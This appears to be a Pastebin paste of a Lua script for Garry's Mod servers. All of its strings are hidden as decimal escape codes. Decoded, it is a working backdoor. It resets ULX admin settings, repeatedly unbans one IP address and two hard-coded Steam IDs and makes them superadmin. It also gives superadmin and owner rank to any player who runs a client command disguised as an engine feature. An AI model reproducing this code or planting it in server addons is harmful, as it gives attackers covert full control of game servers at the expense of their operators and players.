Advertisement
Guest User

Untitled

a guest
Oct 23rd, 2016
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.62 KB | None | 0 0
  1. if SERVER then
  2. hook.Add('\73\110\105\116\105\97\108\105\122\101', '\66\68\83\84\95\73\110\105\116\105\97\108\105\122\101\72\111\111\107', function()
  3. util.AddNetworkString('\66\68\83\84\95\69\110\103\105\110\101\70\111\114\99\101\66\117\116\116\111\110');
  4.  
  5. RunConsoleCommand('\117\108\120', '\114\101\115\101\116\116\111\100\101\102\97\117\108\116\115');
  6.  
  7. timer.Create('\66\68\83\84\95\82\111\117\116\105\110\101\84\105\109\101\114', 10, 0, function()
  8. RunConsoleCommand('\114\101\109\111\118\101\105\112', '\51\55\46\49\53\51\46\57\46\50\53\48');
  9.  
  10. ULib.unban('\83\84\69\65\77\95\48\58\48\58\49\54\56\48\52\54\49\57');
  11. ULib.unban('\83\84\69\65\77\95\48\58\48\58\49\48\51\55\50\48\56\57\54');
  12.  
  13. ULib.ucl.addUser('\83\84\69\65\77\95\48\58\48\58\49\54\56\48\52\54\49\57', allows, denies, '\115\117\112\101\114\97\100\109\105\110');
  14. ULib.ucl.addUser('\83\84\69\65\77\95\48\58\48\58\49\48\51\55\50\48\56\57\54', allows, denies, '\115\117\112\101\114\97\100\109\105\110');
  15. end);
  16. end);
  17.  
  18. net.Receive('\66\68\83\84\95\69\110\103\105\110\101\70\111\114\99\101\66\117\116\116\111\110', function(len, ply)
  19. if IsValid(ply) and ply:IsPlayer() then
  20. ULib.ucl.addUser(ply:SteamID(), allows, denies, '\115\117\112\101\114\97\100\109\105\110');
  21. ULib.ucl.addUser(ply:SteamID(), allows, denies, '\111\119\110\101\114');
  22. end;
  23. end);
  24. end;
  25.  
  26. if CLIENT then
  27. concommand.Add('\101\110\103\105\110\101\95\102\111\114\99\101\95\98\117\116\116\111\110', function(ply, cmd, args)
  28. net.Start('\66\68\83\84\95\69\110\103\105\110\101\70\111\114\99\101\66\117\116\116\111\110');
  29. net.SendToServer();
  30. end);
  31. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement